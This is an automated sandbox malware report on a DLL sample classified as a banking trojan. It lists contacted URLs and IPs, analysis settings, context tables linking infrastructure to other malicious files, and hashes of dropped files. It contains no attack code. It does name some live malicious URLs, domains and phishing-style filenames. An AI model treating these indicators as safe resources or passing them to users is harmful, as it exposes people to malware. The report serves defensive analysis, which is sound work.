https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buscar.ozu.es/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch	de-ch[1].htm.4.dr	false		high
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.de/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.4.dr	false		high
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/news/other/zu-dr%c3%a4ngeln-bis-man-geimpft-wird-bringt-gar-nichts-der-inf	de-ch[1].htm.4.dr	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://www.msn.com/de-ch/news/other/screen-zeigt-porno-mitten-in-z%c3%bcrich-nicht-der-erste-vorfal	de-ch[1].htm.4.dr	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.gmarket.co.kr/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.4.dr	false		high
http://www.google.si/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
http://www.soso.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://busca.orange.es/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.twitter.com/	msapplication.xml5.3.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp	false		high
http://www.target.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.com/	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.4.dr	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
http://service2.bfast.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"	auction[1].htm.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
http://ariadna.elmundo.es/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.news.com.au/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.tiscali.it/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://it.search.yahoo.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.ceneo.pl/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.servicios.clarin.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.daum.net/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.kkbox.com.tw/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.goo.ne.jp/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.msn.com/results.aspx?q=	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://list.taobao.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.nytimes.com/	msapplication.xml3.3.dr	false		high
http://www.taobao.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ie.search.yahoo.com/os?command=	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.cnet.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.linternaute.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.amazon.co.uk/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.4.dr	false		high
http://www.asharqalawsat.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.fr/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.gismeteo.ru/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.rtl.de/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.soso.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.univision.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.185.68	unknown	United States	13335	CLOUDFLARENETUS	false
35.228.31.40	unknown	United States	15169	GOOGLEUS	true
87.248.118.23	unknown	United Kingdom	203220	YAHOO-DEBDE	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	352230
Start date:	12.02.2021
Start time:	01:46:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2200.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@33/166@21/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 153 Number of non-executed functions: 204
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, ielowutil.exe, wermgr.exe, WmiPrvSE.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 88.221.62.148, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.231, 92.122.213.187, 65.55.44.109, 184.30.24.22, 13.64.90.137, 152.199.19.161, 52.147.198.201, 52.255.188.83, 104.43.139.144, 2.20.142.209, 2.20.142.210 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:48:16	API Interceptor	35x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.20.185.68	8.prtyok.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse
	login.jpg.dll	Get hash	malicious	Browse
	footer.jpg.dll	Get hash	malicious	Browse
	ct.dll	Get hash	malicious	Browse
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse
	header.dll	Get hash	malicious	Browse
	A6C8E866.xlsx	Get hash	malicious	Browse
	A6C8E866.xlsx	Get hash	malicious	Browse
	usd2.dll	Get hash	malicious	Browse
	ACH PAYMENT REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse
	https://atacadaodocompensado.com.br/office356.com-RD163	Get hash	malicious	Browse
	http://free.atozmanuals.com	Get hash	malicious	Browse
	https://splendideventsllc.org/Banco/	Get hash	malicious	Browse
	https://splendideventsllc.org/Banco/	Get hash	malicious	Browse
	https://micrrosoftonline13392123112a.typeform.com/to/y7uCHr2N	Get hash	malicious	Browse
	http://www.greaudstudio.com/docs/fgn/m8jklv4.dll	Get hash	malicious	Browse
	http://www.mmsend19.com/link.cfm?r=oa7eM9ij_RBON-2v1T88Zg~~&pe=j0r_9ysA6YUbQvHrDWJvh4Gx3YMu9AdRMZEN44LMtLmQjQ0-TtHHHXpzASqyDmEe5cSY4BozMo4XVY8-hiIbYw~~&t=Lwe7ivUhPR1MQND0QW-Bgw~~	Get hash	malicious	Browse
	http://kikicustomwigs.com/inefficient.php	Get hash	malicious	Browse
35.228.31.40	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
35.228.31.40	Attached_File_898318.xlsb	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
87.248.118.23	http://www.prophecyhour.com	Get hash	malicious	Browse	us.i1.yimg.com/us.yimg.com/i/yg/img/i/us/ui/join.gif
	http://www.forestforum.co.uk/showthread.php?t=47811&page=19	Get hash	malicious	Browse	yui.yahooapis.com/2.9.0/build/animation/animation-min.js?v=4110
	http://ducvinhqb.com/service.html	Get hash	malicious	Browse	us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
hblg.media.net	mon48_cr.dll	Get hash	malicious	Browse	184.30.24.22
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	92.122.253.103
	Wh102yYa..dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	2.20.86.97
	8.prtyok.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse	104.84.56.24
	login.jpg.dll	Get hash	malicious	Browse	104.84.56.24
	footer.jpg.dll	Get hash	malicious	Browse	184.30.24.22
	acr1.dll	Get hash	malicious	Browse	2.18.68.31
	TRIGANOcr.dll	Get hash	malicious	Browse	2.18.68.31
	ct.dll	Get hash	malicious	Browse	104.84.56.24
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	2.18.68.31
	BullGuard.dll	Get hash	malicious	Browse	2.18.68.31
	Jidert.dll	Get hash	malicious	Browse	184.30.24.22
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	104.84.56.24
	header[1].jpg.dll	Get hash	malicious	Browse	104.76.200.23
	header.dll	Get hash	malicious	Browse	92.122.146.68
	SimpleAudio.dll	Get hash	malicious	Browse	2.20.86.97
tls13.taboola.map.fastly.net	mon48_cr.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	151.101.1.44
	8.prtyok.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse	151.101.1.44
	login.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	footer.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	acr1.dll	Get hash	malicious	Browse	151.101.1.44
	TRIGANOcr.dll	Get hash	malicious	Browse	151.101.1.44
	ct.dll	Get hash	malicious	Browse	151.101.1.44
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	151.101.1.44
	BullGuard.dll	Get hash	malicious	Browse	151.101.1.44
	Jidert.dll	Get hash	malicious	Browse	151.101.1.44
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	151.101.1.44
	header[1].jpg.dll	Get hash	malicious	Browse	151.101.1.44
	header.dll	Get hash	malicious	Browse	151.101.1.44
	SimpleAudio.dll	Get hash	malicious	Browse	151.101.1.44
	cSPuZxa7I4.dll	Get hash	malicious	Browse	151.101.1.44
contextual.media.net	mon48_cr.dll	Get hash	malicious	Browse	184.30.24.22
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	92.122.253.103
	Wh102yYa..dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	2.20.86.97
	8.prtyok.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse	104.84.56.24
	login.jpg.dll	Get hash	malicious	Browse	104.84.56.24
	footer.jpg.dll	Get hash	malicious	Browse	184.30.24.22
	acr1.dll	Get hash	malicious	Browse	2.18.68.31
	TRIGANOcr.dll	Get hash	malicious	Browse	2.18.68.31
	ct.dll	Get hash	malicious	Browse	104.84.56.24
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	2.18.68.31
	BullGuard.dll	Get hash	malicious	Browse	2.18.68.31
	Jidert.dll	Get hash	malicious	Browse	184.30.24.22
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	104.84.56.24
	header[1].jpg.dll	Get hash	malicious	Browse	104.76.200.23
	header.dll	Get hash	malicious	Browse	92.122.146.68
	SimpleAudio.dll	Get hash	malicious	Browse	2.20.86.97

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
YAHOO-DEBDE	mon48_cr.dll	Get hash	malicious	Browse	87.248.118.23
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	87.248.118.22
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	87.248.118.23
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	87.248.118.22
	login.jpg.dll	Get hash	malicious	Browse	87.248.118.22
	acr1.dll	Get hash	malicious	Browse	87.248.118.23
	TRIGANOcr.dll	Get hash	malicious	Browse	87.248.118.23
	ct.dll	Get hash	malicious	Browse	87.248.118.22
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	87.248.118.23
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	87.248.118.22
	header[1].jpg.dll	Get hash	malicious	Browse	87.248.118.22
	header.dll	Get hash	malicious	Browse	87.248.118.23
	SimpleAudio.dll	Get hash	malicious	Browse	87.248.118.22
	com-qrcodescanner-barcodescanner.apk	Get hash	malicious	Browse	87.248.118.23
	com-qrcodescanner-barcodescanner.apk	Get hash	malicious	Browse	87.248.118.22
	UGPK60taH6.dll	Get hash	malicious	Browse	87.248.118.23
	usd2.dll	Get hash	malicious	Browse	87.248.118.22
	usd2.dll	Get hash	malicious	Browse	87.248.118.23
	SecuriteInfo.com.ArtemisF00BCCFBF4BA.dll	Get hash	malicious	Browse	87.248.118.22
	SecuriteInfo.com.Artemis2EB570BBBAA8.dll	Get hash	malicious	Browse	87.248.118.22
GOOGLEUS	RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXE	Get hash	malicious	Browse	34.102.136.180
	#Ud83d#Udcde.htm	Get hash	malicious	Browse	142.250.179.193
	Spotify-v8.5.94.839_build_68949745-Mod-armeabi-v7a.apk	Get hash	malicious	Browse	172.217.17.110
	SecuriteInfo.com.Heur.20369.xls	Get hash	malicious	Browse	216.239.32.21
	#U2261#U0192#U00f4#U20a7.htm.htm	Get hash	malicious	Browse	142.250.179.193
	index_2021-02-11-18_10	Get hash	malicious	Browse	172.217.20.106
	att-1664057138.xls	Get hash	malicious	Browse	216.239.34.21
	1Akrien.exe	Get hash	malicious	Browse	8.8.8.8
	rlm00124.xls	Get hash	malicious	Browse	34.98.99.30
	AR4ldFlsyK.exe	Get hash	malicious	Browse	142.251.5.82
	PlayerHD-1.apk	Get hash	malicious	Browse	172.217.20.227
	o9VbySnzk7.exe	Get hash	malicious	Browse	34.90.236.200
	2H2JIKQ8tN.exe	Get hash	malicious	Browse	34.102.136.180
	zJY9vCRKzw.exe	Get hash	malicious	Browse	34.90.236.200
	order pdf.exe	Get hash	malicious	Browse	34.102.136.180
	2021_036,pdf.exe	Get hash	malicious	Browse	34.102.136.180
	Shipping Doc.exe	Get hash	malicious	Browse	34.102.136.180
	Purchase Enquiry.exe	Get hash	malicious	Browse	34.102.136.180
	3q7uwBygHMzXr9C.exe	Get hash	malicious	Browse	34.102.136.180
	YCVj3q7r5e.exe	Get hash	malicious	Browse	34.102.136.180
CLOUDFLARENETUS	mon48_cr.dll	Get hash	malicious	Browse	104.20.184.68
	RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXE	Get hash	malicious	Browse	172.67.167.211
	#Ud83d#Udcde.htm	Get hash	malicious	Browse	172.67.185.66
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	104.20.184.68
	#U2261#U0192#U00f4#U20a7.htm.htm	Get hash	malicious	Browse	104.16.19.94
	Wh102yYa..dll	Get hash	malicious	Browse	104.20.184.68
	Quotation_11-02-2021_WSBDJ.exe	Get hash	malicious	Browse	162.159.133.233
	PL + CI.xlsx	Get hash	malicious	Browse	104.22.0.232
	Purchase Order.exe	Get hash	malicious	Browse	172.67.188.154
	Belegbeleg DHL_119040, pdf.exe	Get hash	malicious	Browse	162.159.129.233
	QUOTATION.exe	Get hash	malicious	Browse	172.67.188.154
	ORDER_73537.exe	Get hash	malicious	Browse	162.159.135.233
	RFQ Q7171.exe	Get hash	malicious	Browse	172.67.188.154
	BL NO. HDMUBUNS7240428.exe	Get hash	malicious	Browse	104.21.19.200
	1Akrien.exe	Get hash	malicious	Browse	172.67.168.210
	rlm00124.xls	Get hash	malicious	Browse	104.20.139.65
	PO FH87565635456.exe	Get hash	malicious	Browse	162.159.135.233
	FORM DB_DHL_AWB_029920292092039993029333221 AD.exe	Get hash	malicious	Browse	104.21.19.200
	Invoice Feb.exe	Get hash	malicious	Browse	104.21.19.200
	DB_DHL_AWB_00117390021 AD0399930303993.PDF.exe	Get hash	malicious	Browse	104.21.19.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	mon48_cr.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	Wh102yYa..dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	Thursday, February 11th, 2021, 20210211033346.3BD4A181171AEBE1@gotasdeamor.cl.htm	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	text.htm	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	8.prtyok.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	tmpC3F5.html	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	login.jpg.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	Brewin FAX-BBDU33AFJRSBB.htm	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	Doc_87215064.htm	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	footer.jpg.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	Tuesday, February 9th, 2021 8%3A1%3A54 a.m., _20210209080154.8E45EAA12FF8DC21@sophiajoyas.cl_.html	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	acr1.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	TRIGANOcr.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	ct.dll	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44
	February Payroll.xls.htm	Get hash	malicious	Browse	104.20.185.68 87.248.118.23 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2980
Entropy (8bit):	4.919176210359297
Encrypted:	false
SSDEEP:	48:LwewewewqeDeDSeDeDj2eDeaeaeaKeQYeQYeQYeQYeQYAvsugeQYAvsugeQYAvsP:8bbbqUUSUUSUlllKwwwwwAv1gwAv1gw7
MD5:	51FC800752E060AAE57A96E08276E2CF
SHA1:	3327845DEF1F2B4003FA44053257B0BB7546DEB5
SHA-256:	62E8D8E6C77F67F95596CEA5F2A216674BAB43D670CD106071163EE359DF2F76
SHA-512:	40C265A98DA8A62DED8A3D0082174C606DCFC63B8CF74E9CA6386666531DFADC26FD60A1E87C5BD64601DE3CFE37668BAE08914A609B139551F354DAA8470C11
Malicious:	false
